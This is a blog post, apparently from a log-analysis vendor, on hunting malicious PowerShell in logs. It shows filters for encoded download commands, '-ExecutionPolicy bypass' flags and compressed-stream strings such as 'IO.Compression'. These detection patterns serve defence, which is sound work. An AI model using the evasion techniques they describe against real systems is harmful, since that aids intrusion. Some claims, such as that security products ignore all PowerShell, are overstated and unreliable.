PowerShell is the most powerful scripting language that has access to the operating system unlike any other tool out in the wild. Since it benefits a great deal in performing certain tasks, windows security system identifies this as safe and ignores any execution takes place by it.
Because of its trusted nature by all security products, adversaries use PowerShell to run commands in hopes of carrying out malicious activities such as executing commands, leveraging encoded commands, obfuscation (with and without encoding), downloading additional payloads, launching additional processes.
In this blog post, we are going to see how to hunt for these suspicious PowerShell activities by focusing on the following attributes:
First we'll load our PowerShell log in Gigasheet, and it looks like this:
Now we can get started.
Malicious payloads are encoded and obfuscated and PowerShell commands are often used to download them from the internet. Usually in PowerShell encoding and obfuscation tend to go together.
To look for encoded and downloadable command line arguments, we need to look at PowerShell logs (either Sysmon or Windows PowerShell logs) and see if there is any match of the following in the command line arguments:
We are going to use Gigasheet to hunt for these in the PowerShell logs.
1. Filter the raw log (in some cases, if you have the ability to filter on the command line column directly, go for it!) and put in the values listed above using the "contains" operator - use the OR condition.
2. Viola! , here is the sample of the match that shows that PowerShell is being called to download a Mimikatz file from the internet.
Execution policy is a safety feature that controls the conditions under which PowerShell loads configuration files and runs scripts. This feature helps prevent the execution of malicious scripts. A popular Execution Policy that attackers tend to leverage is "Bypass". Bypass execution policy means nothing is blocked and there are no warning or prompts by the system.
The pattern we will use to hunt for this activity involves looking for command line arguments that start with parameters used to bypass the local execution policy for scripts.
1. Filter the raw log (if you have the ability to filter on the command line column directly, go for it!) and put the values "-ExecutionPolicy bypass" or "-ep bypass" using the "contains" operator - use the OR condition.
2. The below result indicates the .ps1 files to be bypassed from all configurations set by the system. The second entry goes one step beyond and downloads a suspicious file bypassing the control.
Steam commands are commonly used for processing compressed files or to decompress binary files. These types of activities are common if a user uses PowerShell to compress or decompress data. However they are uncommon to be seen in an organization.
Suspicious PowerShell script execution can be detected via Event Code 4104 that identifies processing compressed stream data. These data can be identified by looking for these strings in the logs: "IO.Compression", "IO.StreamReader", "]::Decompress" and that's exactly we'll be filtering our logs for.
These streams can be leveraged to store malware and could bypass the security system without being detected and execute successfully, thus infecting the system.